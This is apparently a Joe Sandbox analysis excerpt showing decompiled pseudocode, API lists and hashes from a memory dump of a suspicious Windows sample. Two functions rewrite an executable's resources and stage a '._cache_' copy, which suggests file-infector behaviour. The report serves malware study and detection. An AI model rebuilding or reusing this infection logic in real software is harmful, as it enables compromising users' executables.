                                                    • API ID: Menu$LoadString
                                                    • String ID:
                                                    • API String ID: 3688185913-0
                                                    • Opcode ID: 19c4293b5f1cdaa323bef84bcc34fad9663e5c1fef850695ee91956a4cd23356
                                                    • Instruction ID: 8074770e88abfcf8b34beed0e108b3c66a7315ec12ddf3ed763e984ff9a80418
                                                    • Opcode Fuzzy Hash: 19c4293b5f1cdaa323bef84bcc34fad9663e5c1fef850695ee91956a4cd23356
                                                    • Instruction Fuzzy Hash: 21518130A043445ADB61EF6A888575A7AA4AB8430DF0545BBEC059F3A3CA7CEC89875D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402188 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00401A9C: RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                      • Part of subcall function 00401A9C: RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                      • Part of subcall function 00401A9C: LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                      • Part of subcall function 00401A9C: RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                    • RtlEnterCriticalSection.KERNEL32(0049E5CC,00000000,7 ), ref: 004021D3
                                                    • RtlLeaveCriticalSection.KERNEL32(0049E5CC,0040230B), ref: 004022FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                    • String ID: 7
                                                    • API String ID: 2227675388-1331172448
                                                    • Opcode ID: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                    • Instruction ID: 4af8bea66c2055acf7768281f877aa53f35be4b0bc747d0b7dec25e4a478ddf4
                                                    • Opcode Fuzzy Hash: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                    • Instruction Fuzzy Hash: 8441E2B1A04200DFD715CFAADE9562977E0FB68328B6542BFD401E77E1E2799C41CB08
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C5E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E0042C5E4(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x49e928 == 0) {
					 *0x49e900 = E0042C4FC(0, _t8,  *0x49e900, _t17, _t18);
					_t7 =  *0x49e900(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}













                                                    0x0042c5e8
                                                    0x0042c5f2
                                                    0x0042c606
                                                    0x0042c60c
                                                    0x00000000
                                                    0x0042c60c
                                                    0x0042c614
                                                    0x0042c61c
                                                    0x0042c61c
                                                    0x0042c61f
                                                    0x0042c633
                                                    0x0042c621
                                                    0x0042c621
                                                    0x0042c637
                                                    0x0042c623
                                                    0x0042c623
                                                    0x0042c623
                                                    0x0042c624
                                                    0x0042c63b
                                                    0x0042c626
                                                    0x0042c627
                                                    0x0042c62a
                                                    0x0042c62c
                                                    0x0042c62c
                                                    0x0042c62a
                                                    0x0042c624
                                                    0x0042c621
                                                    0x0042c640
                                                    0x0042c643
                                                    0x0042c64d
                                                    0x0042c645
                                                    0x00000000
                                                    0x0042c646

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 0042C646
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    • KiUserCallbackDispatcher.NTDLL ref: 0042C60C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                    • String ID: GetSystemMetrics
                                                    • API String ID: 54681038-96882338
                                                    • Opcode ID: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                    • Instruction ID: e76955a9c08610525c92f9aeab2c1040e91631f36ff756307eb2880b474183d5
                                                    • Opcode Fuzzy Hash: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                    • Instruction Fuzzy Hash: 6EF0B4B07045649ACB709B3DBEC962F7645A7A5374FE0AF33A111472D1C2BCA842529D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00474B04 Relevance: 4.6, APIs: 3, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 62%
                                                    			E00474B04(intOrPtr __eax, void* __ebx, char __ecx, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v13;
				void* _v20;
				intOrPtr _v24;
				void* _t33;
				int _t45;
				char _t48;
				void* _t53;
				intOrPtr _t61;
				intOrPtr _t63;
				void* _t67;
				void* _t68;
				intOrPtr _t69;

				_t67 = _t68;
				_t69 = _t68 + 0xffffffec;
				_v12 = __ecx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t67);
				_push(0x474bff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t69;
				_v24 = E00409A7C(_v8);
				E00409A90(_v8, 0x80);
				_t33 = BeginUpdateResourceA(E00404E80(_v8), 0); // executed
				_t53 = _t33;
				_v13 = _t53 != 0;
				if(_v13 == 0) {
					E00409A90(_v8, _v24);
					_pop(_t61);
					 *[fs:eax] = _t61;
					_push(0x474c06);
					return E004049E4( &_v12, 2);
				} else {
					_push(_t67);
					_push(0x474bd2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t69;
					_v20 = E0040275C(0);
					_t45 = UpdateResourceA(_t53, 0xa, E00404E80(_v12), 0, _v20, 0);
					asm("sbb eax, eax");
					_v13 = _t45 + 1;
					if(EndUpdateResourceA(_t53, 0) == 0 || _v13 == 0) {
						_t48 = 0;
					} else {
						_t48 = 1;
					}
					_v13 = _t48;
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(0x474bd9);
					return E0040277C(_v20);
				}
			}

















                                                    0x00474b05
                                                    0x00474b07
                                                    0x00474b0c
                                                    0x00474b0f
                                                    0x00474b15
                                                    0x00474b1d
                                                    0x00474b24
                                                    0x00474b25
                                                    0x00474b2a
                                                    0x00474b2d
                                                    0x00474b38
                                                    0x00474b43
                                                    0x00474b53
                                                    0x00474b58
                                                    0x00474b5c
                                                    0x00474b64
                                                    0x00474bdf
                                                    0x00474be6
                                                    0x00474be9
                                                    0x00474bec
                                                    0x00474bfe
                                                    0x00474b66
                                                    0x00474b68
                                                    0x00474b69
                                                    0x00474b6e
                                                    0x00474b71
                                                    0x00474b7d
                                                    0x00474b93
                                                    0x00474b9b
                                                    0x00474b9e
                                                    0x00474bab
                                                    0x00474bb3
                                                    0x00474bb7
                                                    0x00474bb7
                                                    0x00474bb7
                                                    0x00474bb9
                                                    0x00474bbe
                                                    0x00474bc1
                                                    0x00474bc4
                                                    0x00474bd1
                                                    0x00474bd1

                                                    APIs
                                                      • Part of subcall function 00409A7C: GetFileAttributesA.KERNEL32(00000000,?,00474B38,00000000,00474BFF), ref: 00409A87
                                                      • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
                                                      • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
                                                    • BeginUpdateResourceA.KERNEL32 ref: 00474B53
                                                    • UpdateResourceA.KERNEL32 ref: 00474B93
                                                    • EndUpdateResourceA.KERNEL32 ref: 00474BA4
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ResourceUpdate$AttributesFile$BeginErrorLast
                                                    • String ID:
                                                    • API String ID: 3622334292-0
                                                    • Opcode ID: 0c6025a9ba0c3fa00e0f0c327aa18df6933148c4a27423e708942d437b537846
                                                    • Instruction ID: 52e1684931c8bafc800cdd43f2787b7e22df09697c22c7a3fc8d55225dfd733d
                                                    • Opcode Fuzzy Hash: 0c6025a9ba0c3fa00e0f0c327aa18df6933148c4a27423e708942d437b537846
                                                    • Instruction Fuzzy Hash: A6216470B04244AFDB01EBB5DC42BAEB7A9EB45704F5144BBF404F2691D778AE10D658
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004015B4 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004015B4(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401468(0x49e5ec, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                    0x004015b7
                                                    0x004015c1
                                                    0x004015d0
                                                    0x004015c3
                                                    0x004015c3
                                                    0x004015c3
                                                    0x004015d6
                                                    0x004015e3
                                                    0x004015e8
                                                    0x004015ea
                                                    0x004015ee
                                                    0x004015f7
                                                    0x004015fe
                                                    0x0040160a
                                                    0x00401611
                                                    0x00000000
                                                    0x00401611
                                                    0x004015fe
                                                    0x00401616

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018BD), ref: 004015E3
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018BD), ref: 0040160A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Virtual$AllocFree
                                                    • String ID: I
                                                    • API String ID: 2087232378-1966777607
                                                    • Opcode ID: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                    • Instruction ID: 653e09eb2cf8d2b73dae0cb6bd44d4e3f867a6d1f4cfde1ef7f913290877d0a1
                                                    • Opcode Fuzzy Hash: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                    • Instruction Fuzzy Hash: FEF02772F003202BEB3059AA4CC1B535AC49F857A4F194076FD08FF3E9D6B58C0142A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00477AD8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 57%
                                                    			E00477AD8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v13;
				char _v14;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v56;
				char _v72;
				char _v76;
				char _v80;
				void* __ecx;
				struct HINSTANCE__* _t54;
				void* _t65;
				void* _t67;
				intOrPtr _t120;
				void* _t123;
				struct HINSTANCE__* _t130;
				struct HINSTANCE__* _t133;
				intOrPtr _t141;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr _t153;
				intOrPtr _t157;
				intOrPtr _t161;
				intOrPtr _t162;

				_t159 = __esi;
				_t158 = __edi;
				_t161 = _t162;
				_t120 = 9;
				do {
					_push(0);
					_push(0);
					_t120 = _t120 - 1;
				} while (_t120 != 0);
				_t1 =  &_v8;
				 *_t1 = _t120;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v13 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t161);
				_push(0x477dae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t162;
				_t118 = E00404E80(_v8);
				_t54 =  *0x49e668; // 0x400000
				if(FindResourceA(_t54, _t53, 0xa) != 0) {
					_v14 = 1;
					E00409F48( &_v28);
					_push(_v28);
					_push(0x477dc8);
					_push("._cache_");
					E00402B68(0,  &_v36);
					E00409E18(_v36,  &_v32);
					_push(_v32);
					E00404D40();
					_push(_t161);
					_push(0x477d03);
					_push( *[fs:eax]);
					 *[fs:eax] = _t162;
					_t65 = E00409A48(_v24, __eflags);
					__eflags = _t65;
					if(_t65 != 0) {
						_t67 = E00474C10(_v24, _t118, _v8, __edi, __esi);
						__eflags = _t67;
						if(_t67 != 0) {
							E00409A90(_v24, 0x80);
							E00409BAC(_v24);
							E00404BB8( &_v56, _t118);
							_t130 =  *0x49e668; // 0x400000
							_v20 = E0041E0D0(_t130, 1, 0xa, _v56);
							_push(_t161);
							_push(0x477ca2);
							_push( *[fs:eax]);
							 *[fs:eax] = _t162;
							E0041DD9C(_v20, _t118, _v24, _t158);
							_pop(_t153);
							 *[fs:eax] = _t153;
							E00403BEC(_v20);
						}
					} else {
						E00404BB8( &_v40, _t118);
						_t133 =  *0x49e668; // 0x400000
						_v20 = E0041E0D0(_t133, 1, 0xa, _v40);
						_push(_t161);
						_push(0x477bd6);
						_push( *[fs:eax]);
						 *[fs:eax] = _t162;
						E0041DD9C(_v20, _t118, _v24, __edi); // executed
						_pop(_t157);
						 *[fs:eax] = _t157;
						E00403BEC(_v20);
					}
					_pop(_t141);
					_pop(_t123);
					 *[fs:eax] = _t141;
					__eflags = 0;
					_push(_t161);
					_push(0x477d81);
					_push( *[fs:eax]);
					 *[fs:eax] = _t162;
					E00409A90(_v24, 6);
					E00472EF0( &_v72, _t118, _t123, __eflags);
					E00404DCC(_v72, 0x477de8);
					if(__eflags == 0) {
						E0047475C( &_v80, _t118, _t158, _t159, __eflags);
						E00473490(_v12, _t118, _v80, _v24, __eflags, 0, 0);
					} else {
						E0047475C( &_v76, _t118, _t158, _t159, __eflags);
						E00473490(_v12, _t118, _v76, _v24, __eflags, 0, _v13); // executed
					}
					_pop(_t145);
					 *[fs:eax] = _t145;
				} else {
					_v14 = 0;
				}
				_pop(_t146);
				 *[fs:eax] = _t146;
				_push(0x477db5);
				E004049E4( &_v80, 0xf);
				return E004049C0( &_v8);
			}
































                                                    0x00477ad8
                                                    0x00477ad8
                                                    0x00477ad9
                                                    0x00477adc
                                                    0x00477ae1
                                                    0x00477ae1
                                                    0x00477ae3
                                                    0x00477ae5
                                                    0x00477ae5
                                                    0x00477ae8
                                                    0x00477ae8
                                                    0x00477aeb
                                                    0x00477aec
                                                    0x00477aed
                                                    0x00477aee
                                                    0x00477af1
                                                    0x00477af4
                                                    0x00477afa
                                                    0x00477b01
                                                    0x00477b02
                                                    0x00477b07
                                                    0x00477b0a
                                                    0x00477b17
                                                    0x00477b1a
                                                    0x00477b27
                                                    0x00477b32
                                                    0x00477b39
                                                    0x00477b3e
                                                    0x00477b41
                                                    0x00477b46
                                                    0x00477b50
                                                    0x00477b5b
                                                    0x00477b60
                                                    0x00477b6b
                                                    0x00477b72
                                                    0x00477b73
                                                    0x00477b78
                                                    0x00477b7b
                                                    0x00477b81
                                                    0x00477b86
                                                    0x00477b88
                                                    0x00477c38
                                                    0x00477c3d
                                                    0x00477c3f
                                                    0x00477c4d
                                                    0x00477c55
                                                    0x00477c5f
                                                    0x00477c6a
                                                    0x00477c7c
                                                    0x00477c81
                                                    0x00477c82
                                                    0x00477c87
                                                    0x00477c8a
                                                    0x00477c93
                                                    0x00477c9a
                                                    0x00477c9d
                                                    0x00477cf4
                                                    0x00477cf4
                                                    0x00477b8e
                                                    0x00477b93
                                                    0x00477b9e
                                                    0x00477bb0
                                                    0x00477bb5
                                                    0x00477bb6
                                                    0x00477bbb
                                                    0x00477bbe
                                                    0x00477bc7
                                                    0x00477bce
                                                    0x00477bd1
                                                    0x00477c28
                                                    0x00477c28
                                                    0x00477cfb
                                                    0x00477cfd
                                                    0x00477cfe
                                                    0x00477d0d
                                                    0x00477d0f
                                                    0x00477d10
                                                    0x00477d15
                                                    0x00477d18
                                                    0x00477d23
                                                    0x00477d2b
                                                    0x00477d38
                                                    0x00477d3d
                                                    0x00477d64
                                                    0x00477d72
                                                    0x00477d3f
                                                    0x00477d48
                                                    0x00477d56
                                                    0x00477d56
                                                    0x00477d79
                                                    0x00477d7c
                                                    0x00477b29
                                                    0x00477b29
                                                    0x00477b29
                                                    0x00477d8d
                                                    0x00477d90
                                                    0x00477d93
                                                    0x00477da0
                                                    0x00477dad

                                                    APIs
                                                    • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 00477B20
                                                      • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,?,00000000,00474795,004747D4,?,00000000,004747BE,?,?,?,?,00000000), ref: 00402B8C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileFindModuleNameResource
                                                    • String ID: ._cache_
                                                    • API String ID: 938654709-4202169512
                                                    • Opcode ID: 1813762d8ab73c72f462dcf35abd4216ef9f666e93594e03b5b88217cc4ef2bb
                                                    • Instruction ID: f4b1b61c27c6b3fcd429a4d8c4df21a5758f96423c611e3672b605c149e07d86
                                                    • Opcode Fuzzy Hash: 1813762d8ab73c72f462dcf35abd4216ef9f666e93594e03b5b88217cc4ef2bb
                                                    • Instruction Fuzzy Hash: 7D61D430A042099FDB11EFA5D852AEEB7B9EF49704F60847BF504B7291D739AD01CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00478CB0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E00478CB0(void* __edx) {
				intOrPtr _t3;
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr _t14;
				intOrPtr _t18;
				intOrPtr _t21;

				_push(_t21);
				_push(0x478d26);
				_push( *[fs:eax]);
				 *[fs:eax] = _t21;
				 *0x49ec80 =  *0x49ec80 + 1;
				if( *0x49ec80 == 0) {
					 *0x49ec84 = 1;
					_t3 =  *0x49ec88; // 0x0
					E00403BEC(_t3);
					_t5 =  *0x49dc9c; // 0x49e020
					 *_t5 = 0;
					_t6 =  *0x49d7a8; // 0x49e000
					 *_t6 = 0;
					_t7 =  *0x49dc20; // 0x49e810
					 *_t7 = 0;
					if( *0x49ec90 != 0) {
						L00417DFC(); // executed
					}
					_t18 =  *0x401094; // 0x401098
					E004054C8(0x49c9e8, 5, _t18);
				}
				_pop(_t14);
				 *[fs:eax] = _t14;
				_push(0x478d2d);
				return 0;
			}










                                                    0x00478cb5
                                                    0x00478cb6
                                                    0x00478cbb
                                                    0x00478cbe
                                                    0x00478cc1
                                                    0x00478cc7
                                                    0x00478cc9
                                                    0x00478cd0
                                                    0x00478cd5
                                                    0x00478cda
                                                    0x00478ce1
                                                    0x00478ce3
                                                    0x00478cea
                                                    0x00478cec
                                                    0x00478cf3
                                                    0x00478cfc
                                                    0x00478cfe
                                                    0x00478cfe
                                                    0x00478d0d
                                                    0x00478d13
                                                    0x00478d13
                                                    0x00478d1a
                                                    0x00478d1d
                                                    0x00478d20
                                                    0x00478d25

                                                    APIs
                                                    • 742FF460.OLE32(00000000,00478D26), ref: 00478CFE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: F460
                                                    • String ID: I
                                                    • API String ID: 329004136-429267355
                                                    • Opcode ID: 9cca7072fc9e56bcc694ba2f6119dd7fbf3d3764145fe58f9e0d1812247d53b8
                                                    • Instruction ID: 9009332550508c6597b3b9da99e6bfd18627bf9d89c0e286b3a7dbd72528ea00
                                                    • Opcode Fuzzy Hash: 9cca7072fc9e56bcc694ba2f6119dd7fbf3d3764145fe58f9e0d1812247d53b8
                                                    • Instruction Fuzzy Hash: 43F0A4706046408FF315DF2AED156567BE5EBA9304B828477E408976B1DE785802CB1C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00446564 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00446564(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x4465ea);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x49eb20 =  *0x49eb20 - 1;
				if( *0x49eb20 < 0) {
					 *0x49eb1c = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x49eb1c;
					E00446330(_t16, __edi,  *0x49eb1c);
					_t6 =  *0x436dd0; // 0x436e1c
					E0041A4A8(_t6, _t16, _t17,  *0x49eb1c);
					_t8 =  *0x436dd0; // 0x436e1c
					E0041A548(_t8, _t16, _t17, _t31);
					_t21 =  *0x436dd0; // 0x436e1c
					_t10 =  *0x447948; // 0x447994
					E0041A4F4(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x436dd0; // 0x436e1c
					_t12 =  *0x4465f4; // 0x446640
					E0041A4F4(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x436dd0; // 0x436e1c
					_t14 =  *0x44675c; // 0x4467a8
					E0041A4F4(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x4465f1);
				return 0;
			}















                                                    0x00446564
                                                    0x00446564
                                                    0x00446569
                                                    0x0044656a
                                                    0x0044656f
                                                    0x00446572
                                                    0x00446575
                                                    0x0044657c
                                                    0x0044658c
                                                    0x0044658c
                                                    0x00446593
                                                    0x00446598
                                                    0x0044659d
                                                    0x004465a2
                                                    0x004465a7
                                                    0x004465ac
                                                    0x004465b2
                                                    0x004465b7
                                                    0x004465bc
                                                    0x004465c2
                                                    0x004465c7
                                                    0x004465cc
                                                    0x004465d2
                                                    0x004465d7
                                                    0x004465d7
                                                    0x004465de
                                                    0x004465e1
                                                    0x004465e4
                                                    0x004465e9

                                                    APIs
                                                    • GetVersion.KERNEL32(00000000,004465EA), ref: 0044657E
                                                      • Part of subcall function 00446330: GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                      • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 00446384
                                                      • Part of subcall function 00446330: GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                      • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                      • Part of subcall function 00446330: RegisterClipboardFormatA.USER32 ref: 004463EB
                                                      • Part of subcall function 00446330: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                      • Part of subcall function 00446330: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                    • String ID: @fD
                                                    • API String ID: 3775504709-3452771706
                                                    • Opcode ID: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                    • Instruction ID: a2d0d9fa5674fa572cfd9e012cd62e1639ea6f2d0861d92eee2e079839ffb759
                                                    • Opcode Fuzzy Hash: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                    • Instruction Fuzzy Hash: FBF04F78214241AFE305FF2AFC5291937A4FB86314792947AF400436A6CA3CA851CB0E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040484C Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E0040484C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
					L3:
					if( *0x49b004 != 0) {
						E00404734();
						E004047C0(_t32);
						 *0x49b004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
							 *0x0049E644 = 0;
						}
						E004045C4(); // executed
						if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
							_t14 =  *0x0049E648;
							if( *0x0049E648 != 0) {
								E0040653C(_t14);
								_t35 =  *((intOrPtr*)(0x49e648));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
